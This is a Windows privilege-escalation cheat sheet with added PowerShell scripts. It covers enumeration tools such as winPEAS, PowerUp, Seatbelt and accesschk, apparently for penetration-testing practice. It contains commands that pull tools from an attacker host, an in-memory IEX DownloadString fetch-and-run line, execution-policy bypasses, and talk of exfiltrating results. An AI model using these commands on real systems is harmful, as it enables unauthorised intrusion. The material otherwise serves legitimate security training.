
Running Scripts

Host the tools on your own machine (python -m http.server, for example) and pull them onto the target with certutil or PowerShell's Invoke-WebRequest. Run them from a directory the current user can actually write to, such as:

C:\Temp
C:\Users\Public

Check with icacls <dir> (or a quick test write) before relying on a directory; C:\Temp does not exist on every host.
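
The transfer step end to end, as an added PowerShell example (not code from the original page): the attacker hosts the tool directory with python -m http.server; on the target the script first confirms that a drop directory is writable by creating and deleting a probe file, then downloads the binary and hashes it so you can compare against the copy on your box. The attacker address 10.10.14.5, port 8000 and the tool name winPEASany.exe are assumptions.

```powershell
# Added example, not from the original page.
# Attacker side (run in the directory holding the tools):
#   python3 -m http.server 8000
# Target side (PowerShell 3+). Attacker IP/port and tool name are assumptions.
$attacker = 'http://10.10.14.5:8000'
$tool     = 'winPEASany.exe'

# Candidate drop directories: the two from the page plus whatever is on PATH
# (a writable PATH entry is itself worth knowing about).
$candidates = @('C:\Temp', 'C:\Users\Public') + ($env:Path -split ';' | Where-Object { $_ })

# A directory is only useful if the current user can really create files in it,
# so probe with a randomly named file and remove it again. This does touch disk
# (USN journal, AV telemetry); skip it on engagements that forbid writes.
$dropDir = $null
foreach ($dir in ($candidates | Sort-Object -Unique)) {
    if (-not (Test-Path -LiteralPath $dir -PathType Container)) { continue }
    $probe = Join-Path $dir ([IO.Path]::GetRandomFileName())
    try {
        [IO.File]::WriteAllText($probe, 'probe')
        Remove-Item -LiteralPath $probe -Force
        Write-Output "[writable] $dir"
        if (-not $dropDir) { $dropDir = $dir }
    } catch {
        # Access denied or read-only volume: not a usable drop directory
    }
}
if (-not $dropDir) { throw 'no writable directory found' }

# Pull the tool down. The commented certutil line is the fallback for a
# cmd-only shell or a host without PowerShell 3.
$dest = Join-Path $dropDir $tool
Invoke-WebRequest -Uri "$attacker/$tool" -OutFile $dest -UseBasicParsing
# certutil.exe -urlcache -split -f http://10.10.14.5:8000/winPEASany.exe C:\Users\Public\winPEASany.exe

# Compare against the hash on the attacker box before executing (PowerShell 4+).
Get-FileHash -Algorithm SHA256 -LiteralPath $dest
```

The first directory that passes the probe is used as the drop location; the remaining writable directories are printed because a writable PATH entry can matter later for DLL or binary hijacking checks.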

Windows Exploit Suggester (WES)

Compares the patch level reported by systeminfo against Microsoft's security bulletin database and lists missing patches that have public exploits or Metasploit modules. It is a Python 2 script and needs the xlrd module to read the .xls database. The bulletin feed it depends on was discontinued by Microsoft in 2017, so it is only useful against older targets; WES-NG is the successor for current builds. The repository now lives under the AonCyberLabs GitHub organisation; the GDSSecurity URL below redirects there.

Setup and Usage:

git clone https://github.com/GDSSecurity/Windows-Exploit-Suggester.git
cd Windows-Exploit-Suggester
python windows-exploit-suggester.py --update

On the target machine:

systeminfo > sysinfo.txt

Run the analysis against the .xls that --update downloaded (the date in the filename is the download date):

python windows-exploit-suggester.py --database 2018-02-08-mssb.xls --systeminfo sysinfo.txt

If systeminfo lists the hotfixes as "File 1" instead of KB numbers (common on Windows 7 and later), dump them separately on the target with wmic qfe list full > hotfixes.txt and pass that file with --hotfixes:

python windows-exploit-suggester.py --database 2018-02-08-mssb.xls --systeminfo sysinfo.txt --hotfixes hotfixes.txt

PowerUp.ps1

Detects common privilege escalation misconfigurations from PowerShell: weak service binary and service permissions, unquoted service paths, AlwaysInstallElevated, writable autoruns and registry keys, and similar.

wget https://raw.githubusercontent.com/PowerShellEmpire/PowerTools/master/PowerUp/PowerUp.ps1

Run manually:

powershell -exec bypass
. .\PowerUp.ps1
Invoke-AllChecks

Or fetch and run it in memory without writing the script to disk:

powershell.exe -nop -exec bypass "IEX (New-Object Net.WebClient).DownloadString('https://your-site.com/PowerUp.ps1'); Invoke-AllChecks"

SharpUp.exe (if PowerShell is restricted)

C# port of PowerUp's checks, for hosts where PowerShell is locked down or heavily logged. Current builds require the audit verb to run every check (older builds took no argument at all):

.\SharpUp.exe audit

Seatbelt.exe

Collects extensive system information for post-exploitation or privilege escalation checks.

Usage (current releases select checks with -group=; older builds took the bare word all):

.\Seatbelt.exe -group=all
.\Seatbelt.exe <check> <check>

winPEASany.exe

Broad enumeration tool with colour-coded output; red and yellow mark the findings most likely to be exploitable.

Enable ANSI colours in cmd (takes effect in a newly opened console):

reg add HKCU\Console /v VirtualTerminalLevel /t REG_DWORD /d 1

Run the quick pass, or only the system-information checks:

.\winPEASany.exe quiet cmd fast
.\winPEASany.exe quiet cmd systeminfo

accesschk.exe

Sysinternals tool that reports the access a user or group has on files, directories, services and registry keys.

Accept the EULA once (it is recorded in HKCU; putting -accepteula on the same command line also works in a non-interactive shell):

accesschk.exe /accepteula

Find files writable by low-privileged groups (-u suppress errors, -w write access only, -q omit the banner, -s recurse):

accesschk.exe -uwqs Users c:\*.*
accesschk.exe -uwqs "Authenticated Users" c:\*.*

Same for directories (-d restricts the output to directories):

accesschk.exe -uwdqs Users c:\
accesschk.exe -uwdqs "Authenticated Users" c:\
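
The service check that accesschk also covers, written here as an added PowerShell example (not code from the page or from Sysinternals): for every service it resolves the executable path, flags it if BUILTIN\Users, Authenticated Users or Everyone hold write rights on the binary, and flags unquoted paths that contain spaces. It needs no extra binary on disk, which helps when dropping accesschk.exe is not an option.

```powershell
# Added example, not from the original page: services whose executable a
# low-privileged principal can overwrite, plus unquoted service paths.
# Group names are localised on non-English Windows; compare SIDs there
# (S-1-5-32-545 Users, S-1-5-11 Authenticated Users, S-1-1-0 Everyone).
$weakPrincipals = @('BUILTIN\Users', 'NT AUTHORITY\Authenticated Users', 'Everyone')
# Any one of these rights is enough to replace or tamper with the binary.
$writeMask = [System.Security.AccessControl.FileSystemRights]'WriteData, AppendData, Delete, ChangePermissions, TakeOwnership'

function Get-ServiceBinaryPath {
    param([string]$PathName)
    # "C:\Program Files\x\svc.exe" -k args  -> the quoted part
    if ($PathName -match '^\s*"([^"]+)"') { return $Matches[1] }
    # C:\Program Files\x\svc.exe -k args    -> everything up to the first .exe
    if ($PathName -match '^\s*(.+?\.exe)') { return $Matches[1] }
    return $null
}

Get-CimInstance -ClassName Win32_Service | ForEach-Object {
    $svc = $_
    $bin = Get-ServiceBinaryPath $svc.PathName
    if (-not $bin) { return }

    # Unquoted path with a space: Windows tries each prefix as an executable.
    if ($svc.PathName -notmatch '^\s*"' -and $bin -match ' ') {
        Write-Output ('[unquoted path] {0} ({1}) -> {2}' -f $svc.Name, $svc.StartName, $svc.PathName)
    }
    if (-not (Test-Path -LiteralPath $bin -PathType Leaf)) { return }

    try { $acl = Get-Acl -LiteralPath $bin } catch { return }
    foreach ($ace in $acl.Access) {
        if ($ace.AccessControlType -ne 'Allow') { continue }
        if ($weakPrincipals -notcontains $ace.IdentityReference.Value) { continue }
        if (($ace.FileSystemRights -band $writeMask) -ne 0) {
            $msg = '[writable binary] {0} runs as {1}: {2} has {3} on {4}'
            Write-Output ($msg -f $svc.Name, $svc.StartName, $ace.IdentityReference, $ace.FileSystemRights, $bin)
        }
    }
}
```

A hit is only interesting if the service runs as a privileged account (the StartName column) and you can restart it or wait for a reboot, which is the same follow-up PowerUp's service checks ask you to make.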

PrivescCheck.ps1

Scans for exploitable misconfigurations (services, scheduled tasks, stored credentials, and more) and collects the system data you need to interpret them.

From cmd:

powershell -ep bypass -c ". .\PrivescCheck.ps1; Invoke-PrivescCheck"

From PowerShell:

Set-ExecutionPolicy Bypass -Scope process -Force
. .\PrivescCheck.ps1; Invoke-PrivescCheck

Extended mode (runs the additional, slower checks):

powershell -ep bypass -c ". .\PrivescCheck.ps1; Invoke-PrivescCheck -Extended"

Remember

  • Start with non-invasive enumeration (systeminfo, whoami /all, the read-only checks above) before running anything that writes to disk or modifies the host.
  • Do not run the auto-exploit options of these tools, or the kernel exploits WES suggests, in exam or production environments without first confirming the exact build and patch level; a mismatched kernel exploit can crash the target.
  • Save every tool's output to a .txt file for review and reporting; the first run is usually the only quiet one you get.
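
One way to follow the last point, as an added PowerShell example (not code from the original page): run the non-invasive builtins first, then each dropped tool, and send every output stream of each step to its own .txt in a timestamped folder. It assumes the tools sit in the current directory and that C:\Users\Public is writable; steps whose binary is missing are skipped rather than aborting the run.

```powershell
# Added example, not from the original page: batch the enumeration and keep
# one .txt per step. Requires PowerShell 3+ for [ordered] and the *> redirect.
$outDir = Join-Path 'C:\Users\Public' ('enum_{0}_{1:yyyyMMdd_HHmmss}' -f $env:COMPUTERNAME, (Get-Date))
New-Item -ItemType Directory -Path $outDir -Force | Out-Null

# Ordered so the read-only builtins run before anything dropped on the box.
# wmic has been removed from recent Windows 11 builds; use Get-HotFix there.
$steps = [ordered]@{
    '01_systeminfo'   = { systeminfo }
    '02_hotfixes'     = { wmic qfe list full }
    '03_whoami'       = { whoami /all }
    '04_winpeas'      = { .\winPEASany.exe quiet cmd fast }
    '05_seatbelt'     = { .\Seatbelt.exe all }
    '06_accesschk'    = { .\accesschk.exe -accepteula -uwqs Users C:\*.* }
    '07_privesccheck' = { . .\PrivescCheck.ps1; Invoke-PrivescCheck -Extended }
}

foreach ($name in $steps.Keys) {
    $file = Join-Path $outDir "$name.txt"
    # Pull the .\tool name out of the step so missing binaries are skipped cleanly.
    $exe = [regex]::Match($steps[$name].ToString(), '\.\\(\S+\.(exe|ps1))').Groups[1].Value
    if ($exe -and -not (Test-Path -LiteralPath ".\$exe")) {
        Write-Host "[-] $name skipped ($exe not found)"
        continue
    }
    Write-Host "[*] $name -> $file"
    # *> sends every stream (stdout, errors, warnings) to the file.
    try   { & $steps[$name] *> $file }
    catch { "ERROR: $_" | Out-File -FilePath $file -Append }
}

Get-ChildItem -LiteralPath $outDir | Select-Object Name, Length
```

The 02_hotfixes file is the one to hand to WES with --hotfixes when systeminfo does not list KB numbers, and the whole folder is what you exfiltrate for offline review so the tools only have to be run once on the target.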